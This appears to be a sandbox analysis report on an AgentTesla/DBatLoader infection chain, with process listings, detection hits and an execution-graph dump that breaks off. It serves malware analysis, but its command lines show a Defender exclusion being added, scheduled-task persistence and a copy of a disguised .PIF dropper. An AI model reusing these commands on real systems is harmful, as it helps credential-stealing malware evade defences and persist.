                                                                                                                              Imagebase:0x220000
                                                                                                                              File size:352'768 bytes
                                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:8
                                                                                                                              Start time:10:28:10
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
                                                                                                                              Imagebase:0x220000
                                                                                                                              File size:352'768 bytes
                                                                                                                              MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:9
                                                                                                                              Start time:10:28:10
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:10:28:10
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:68'096 bytes
                                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:11
                                                                                                                              Start time:10:28:11
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                              Imagebase:0x540000
                                                                                                                              File size:250'368 bytes
                                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000000.2176656166.0000000000542000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2337075849.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 82%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:12
                                                                                                                              Start time:10:28:11
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                              Imagebase:0xa40000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 66%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:13
                                                                                                                              Start time:10:28:13
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                              Imagebase:0x430000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:14
                                                                                                                              Start time:10:28:13
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:15
                                                                                                                              Start time:10:28:14
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
                                                                                                                              Imagebase:0x4a0000
                                                                                                                              File size:187'904 bytes
                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:16
                                                                                                                              Start time:10:28:14
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:18
                                                                                                                              Start time:10:28:15
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                              Imagebase:0x3a0000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 66%, ReversingLabs
                                                                                                                              Has exited:false

                                                                                                                              Target ID:19
                                                                                                                              Start time:10:28:16
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd""
                                                                                                                              Imagebase:0x790000
                                                                                                                              File size:236'544 bytes
                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:20
                                                                                                                              Start time:10:28:16
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:21
                                                                                                                              Start time:10:28:16
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:timeout 6
                                                                                                                              Imagebase:0x870000
                                                                                                                              File size:25'088 bytes
                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:22
                                                                                                                              Start time:10:28:16
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              Imagebase:0xb80000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:23
                                                                                                                              Start time:10:28:17
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              Imagebase:0x7ff6ef0c0000
                                                                                                                              File size:496'640 bytes
                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:24
                                                                                                                              Start time:10:28:22
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'224'192 bytes
                                                                                                                              MD5 hash:86EE0E8789E9C11F707D056C4052292E
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 21%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              Target ID:25
                                                                                                                              Start time:10:28:23
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:68'096 bytes
                                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:true

                                                                                                                              Target ID:26
                                                                                                                              Start time:10:28:24
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                              Imagebase:0x2e0000
                                                                                                                              File size:250'368 bytes
                                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2422352208.00000000026FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2422352208.0000000002704000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2422352208.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:true

                                                                                                                              Target ID:27
                                                                                                                              Start time:10:28:24
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                              Imagebase:0x280000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:28
                                                                                                                              Start time:10:28:30
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'224'192 bytes
                                                                                                                              MD5 hash:86EE0E8789E9C11F707D056C4052292E
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Has exited:true

                                                                                                                              Target ID:29
                                                                                                                              Start time:10:28:31
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:68'096 bytes
                                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:true

                                                                                                                              Target ID:30
                                                                                                                              Start time:10:28:32
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                                              Imagebase:0xfa0000
                                                                                                                              File size:250'368 bytes
                                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001E.00000002.4526973764.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:false

                                                                                                                              Target ID:31
                                                                                                                              Start time:10:28:32
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                                              Imagebase:0x510000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:32
                                                                                                                              Start time:10:28:38
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                              Imagebase:0xa10000
                                                                                                                              File size:231'936 bytes
                                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:16.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:30.4%
                                                                                                                                Total number of Nodes:1630
                                                                                                                                Total number of Limit Nodes:19
                                                                                                                                execution_graph 32354 2b33e12 33906 2b14860 32354->33906 33907 2b14871 33906->33907 33908 2b14897 33907->33908 33909 2b148ae 33907->33909 33915 2b14bcc 33908->33915 33924 2b145a0 33909->33924 33912 2b148a4 33913 2b148df 33912->33913 33929 2b14530 33912->33929 33916 2b14bd9 33915->33916 33923 2b14c09 33915->33923 33917 2b14c02 33916->33917 33920 2b14be5 33916->33920 33921 2b145a0 11 API calls 33917->33921 33919 2b14bf3 33919->33912 33935 2b12c44 11 API calls 33920->33935 33921->33923 33936 2b144dc 33923->33936 33925 2b145a4 33924->33925 33926 2b145c8 33924->33926 33949 2b12c10 33925->33949 33926->33912 33928 2b145b1 33928->33912 33930 2b14534 33929->33930 33933 2b14544 33929->33933 33932 2b145a0 11 API calls 33930->33932 33930->33933 33931 2b14572 33931->33913 33932->33933 33933->33931 33934 2b12c2c 11 API calls 33933->33934 33934->33931 33935->33919 33937 2b144e2 33936->33937 33938 2b144fd 33936->33938 33937->33938 33940 2b12c2c 33937->33940 33938->33919 33941 2b12c3a 33940->33941 33943 2b12c30 33940->33943 33941->33938 33942 2b12d19 33948 2b12ce8 7 API calls 33942->33948 33943->33941 33943->33942 33947 2b16520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33943->33947 33946 2b12d3a 33946->33938 33947->33942 33948->33946 33950 2b12c27 33949->33950 33952 2b12c14 33949->33952 33950->33928 33951 2b12c1e 33951->33928 33952->33951 33954 2b12d19 33952->33954 33957 2b16520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33952->33957 33958 2b12ce8 7 API calls 33954->33958 33956 2b12d3a 33956->33928 33957->33954 33958->33956 33959 2b3c350 33962 2b2f7c8 33959->33962 33963 2b2f7d0 33962->33963 33963->33963 33964 2b2f7d7 33963->33964 36405 2b288b8 LoadLibraryW 33964->36405 33966 2b2f7f1 36410 2b12ee0 QueryPerformanceCounter 33966->36410 33968 2b2f7f6 33969 2b2f800 InetIsOffline 33968->33969 33970 2b2f80a 33969->33970 33971 2b2f81b 33969->33971 33973 2b14530 11 API calls 33970->33973 33972 2b14530 11 API calls 33971->33972 33974 2b2f82a 33972->33974 33975 2b2f819 33973->33975 33976 2b14860 11 API calls 33974->33976 33975->33974 33977 2b2f848 33976->33977 33978 2b2f850 33977->33978 36413 2b146d4 33978->36413 36415 2b28274 36405->36415 36407 2b288f1 36426 2b27d78 36407->36426 36411 2b12ef8 GetTickCount 36410->36411 36412 2b12eed 36410->36412 36411->33968 36412->33968 36414 2b146da 36413->36414 36416 2b14530 11 API calls 36415->36416 36417 2b28299 36416->36417 36440 2b2798c 36417->36440 36421 2b282b3 36422 2b282bb GetModuleHandleW GetProcAddress GetProcAddress 36421->36422 36423 2b282ee 36422->36423 36461 2b14500 36423->36461 36427 2b14530 11 API calls 36426->36427 36428 2b27d9d 36427->36428 36429 2b2798c 12 API calls 36428->36429 36430 2b27daa 36429->36430 36431 2b147ec 11 API calls 36430->36431 36432 2b27dba 36431->36432 36466 2b281cc 36432->36466 36435 2b28274 15 API calls 36436 2b27dd3 NtWriteVirtualMemory 36435->36436 36437 2b27dff 36436->36437 36438 2b14500 11 API calls 36437->36438 36439 2b27e0c FreeLibrary 36438->36439 36439->33966 36441 2b2799d 36440->36441 36442 2b14bcc 11 API calls 36441->36442 36444 2b279ad 36442->36444 36443 2b27a19 36446 2b147ec 36443->36446 36444->36443 36465 2b1babc CharNextA 36444->36465 36447 2b14851 36446->36447 36448 2b147f0 36446->36448 36449 2b14530 36448->36449 36450 2b147f8 36448->36450 36454 2b145a0 11 API calls 36449->36454 36455 2b14544 36449->36455 36450->36447 36452 2b14807 36450->36452 36456 2b14530 11 API calls 36450->36456 36451 2b14572 36451->36421 36453 2b145a0 11 API calls 36452->36453 36458 2b14821 36453->36458 36454->36455 36455->36451 36457 2b12c2c 11 API calls 36455->36457 36456->36452 36457->36451 36459 2b14530 11 API calls 36458->36459 36460 2b1484d 36459->36460 36460->36421 36463 2b14506 36461->36463 36462 2b1452c 36462->36407 36463->36462 36464 2b12c2c 11 API calls 36463->36464 36464->36463 36465->36444 36467 2b14530 11 API calls 36466->36467 36468 2b281ef 36467->36468 36469 2b2798c 12 API calls 36468->36469 36470 2b281fc 36469->36470 36471 2b28204 GetModuleHandleA 36470->36471 36472 2b28274 15 API calls 36471->36472 36473 2b28215 GetModuleHandleA 36472->36473 36474 2b28233 36473->36474 36475 2b144dc 11 API calls 36474->36475 36476 2b27dcd 36475->36476 36476->36435 36477 2b37074 36478 2b14860 11 API calls 36477->36478 36479 2b37095 36478->36479 36480 2b147ec 11 API calls 36479->36480 36481 2b370cc 36480->36481 37298 2b289d0 36481->37298 36484 2b14860 11 API calls 36485 2b37111 36484->36485 36486 2b147ec 11 API calls 36485->36486 36487 2b37148 36486->36487 36488 2b289d0 20 API calls 36487->36488 36489 2b3716c 36488->36489 36490 2b14860 11 API calls 36489->36490 36491 2b3718d 36490->36491 36492 2b147ec 11 API calls 36491->36492 36493 2b371c4 36492->36493 36494 2b289d0 20 API calls 36493->36494 36495 2b371e8 36494->36495 36496 2b14860 11 API calls 36495->36496 36497 2b37209 36496->36497 36498 2b147ec 11 API calls 36497->36498 36499 2b37240 36498->36499 36500 2b289d0 20 API calls 36499->36500 36501 2b37264 36500->36501 36502 2b14860 11 API calls 36501->36502 36503 2b37285 36502->36503 36504 2b147ec 11 API calls 36503->36504 36505 2b372bc 36504->36505 36506 2b289d0 20 API calls 36505->36506 36507 2b372e0 36506->36507 36508 2b14860 11 API calls 36507->36508 36509 2b3731a 36508->36509 37311 2b2e0f8 36509->37311 36511 2b37349 37321 2b2f214 36511->37321 36514 2b14860 11 API calls 36515 2b37399 36514->36515 36516 2b147ec 11 API calls 36515->36516 36517 2b373d0 36516->36517 36518 2b289d0 20 API calls 36517->36518 36519 2b373f4 36518->36519 36520 2b14860 11 API calls 36519->36520 36521 2b37415 36520->36521 36522 2b147ec 11 API calls 36521->36522 36523 2b3744c 36522->36523 36524 2b289d0 20 API calls 36523->36524 36525 2b37470 36524->36525 36526 2b14860 11 API calls 36525->36526 36527 2b37491 36526->36527 36528 2b147ec 11 API calls 36527->36528 36529 2b374c8 36528->36529 36530 2b289d0 20 API calls 36529->36530 36531 2b374ec 36530->36531 36532 2b14860 11 API calls 36531->36532 36533 2b3750d 36532->36533 36534 2b147ec 11 API calls 36533->36534 36535 2b37544 36534->36535 36536 2b289d0 20 API calls 36535->36536 36537 2b37568 36536->36537 36538 2b14860 11 API calls 36537->36538 36539 2b37589 36538->36539 36540 2b147ec 11 API calls 36539->36540 36541 2b375c0 36540->36541 36542 2b289d0 20 API calls 36541->36542 36543 2b375e4 36542->36543 36544 2b14860 11 API calls 36543->36544 36545 2b37605 36544->36545 36546 2b147ec 11 API calls 36545->36546 36547 2b3763c 36546->36547 36548 2b289d0 20 API calls 36547->36548 36549 2b37660 36548->36549 36550 2b14860 11 API calls 36549->36550 36551 2b37681 36550->36551 36552 2b147ec 11 API calls 36551->36552 36553 2b376b8 36552->36553 36554 2b289d0 20 API calls 36553->36554 36555 2b376dc 36554->36555 36556 2b14860 11 API calls 36555->36556 36557 2b376fd 36556->36557 36558 2b147ec 11 API calls 36557->36558 36559 2b37734 36558->36559 36560 2b289d0 20 API calls 36559->36560 36561 2b37758 36560->36561 36562 2b14860 11 API calls 36561->36562 36563 2b37779 36562->36563 36564 2b147ec 11 API calls 36563->36564 36565 2b377b0 36564->36565 36566 2b289d0 20 API calls 36565->36566 36567 2b377d4 36566->36567 36568 2b377e9 36567->36568 36569 2b38318 36567->36569 36570 2b14860 11 API calls 36568->36570 36571 2b14860 11 API calls 36569->36571 36572 2b3780a 36570->36572 36573 2b38339 36571->36573 36574 2b147ec 11 API calls 36572->36574 36575 2b147ec 11 API calls 36573->36575 36576 2b37841 36574->36576 36577 2b38370 36575->36577 36578 2b289d0 20 API calls 36576->36578 36579 2b289d0 20 API calls 36577->36579 36580 2b37865 36578->36580 36581 2b38394 36579->36581 36582 2b14860 11 API calls 36580->36582 36583 2b14860 11 API calls 36581->36583 36584 2b37886 36582->36584 36585 2b383b5 36583->36585 36586 2b147ec 11 API calls 36584->36586 36587 2b147ec 11 API calls 36585->36587 36588 2b378bd 36586->36588 36589 2b383ec 36587->36589 36590 2b289d0 20 API calls 36588->36590 36591 2b289d0 20 API calls 36589->36591 36592 2b378e1 36590->36592 36593 2b38410 36591->36593 36594 2b14860 11 API calls 36592->36594 36595 2b14860 11 API calls 36593->36595 36596 2b37902 36594->36596 36597 2b38431 36595->36597 36598 2b147ec 11 API calls 36596->36598 36599 2b147ec 11 API calls 36597->36599 36600 2b37939 36598->36600 36601 2b38468 36599->36601 36602 2b289d0 20 API calls 36600->36602 36603 2b289d0 20 API calls 36601->36603 36604 2b3795d 36602->36604 36605 2b3848c 36603->36605 36606 2b147ec 11 API calls 36604->36606 36607 2b14860 11 API calls 36605->36607 36608 2b37975 36606->36608 36610 2b384ad 36607->36610 37783 2b285bc 36608->37783 36613 2b147ec 11 API calls 36610->36613 36612 2b14860 11 API calls 36614 2b379a7 36612->36614 36615 2b384e4 36613->36615 36616 2b147ec 11 API calls 36614->36616 36617 2b289d0 20 API calls 36615->36617 36619 2b379de 36616->36619 36618 2b38508 36617->36618 36620 2b393a1 36618->36620 36621 2b3851d 36618->36621 36624 2b289d0 20 API calls 36619->36624 36622 2b14860 11 API calls 36620->36622 36623 2b14860 11 API calls 36621->36623 36628 2b393c2 36622->36628 36625 2b3853e 36623->36625 36626 2b37a02 36624->36626 36629 2b38556 36625->36629 36627 2b14860 11 API calls 36626->36627 36632 2b37a23 36627->36632 36630 2b147ec 11 API calls 36628->36630 36631 2b147ec 11 API calls 36629->36631 36636 2b393f9 36630->36636 36633 2b38575 36631->36633 36634 2b147ec 11 API calls 36632->36634 36635 2b3858d 36633->36635 36639 2b37a5a 36634->36639 36637 2b289d0 20 API calls 36635->36637 36638 2b289d0 20 API calls 36636->36638 36640 2b38599 36637->36640 36641 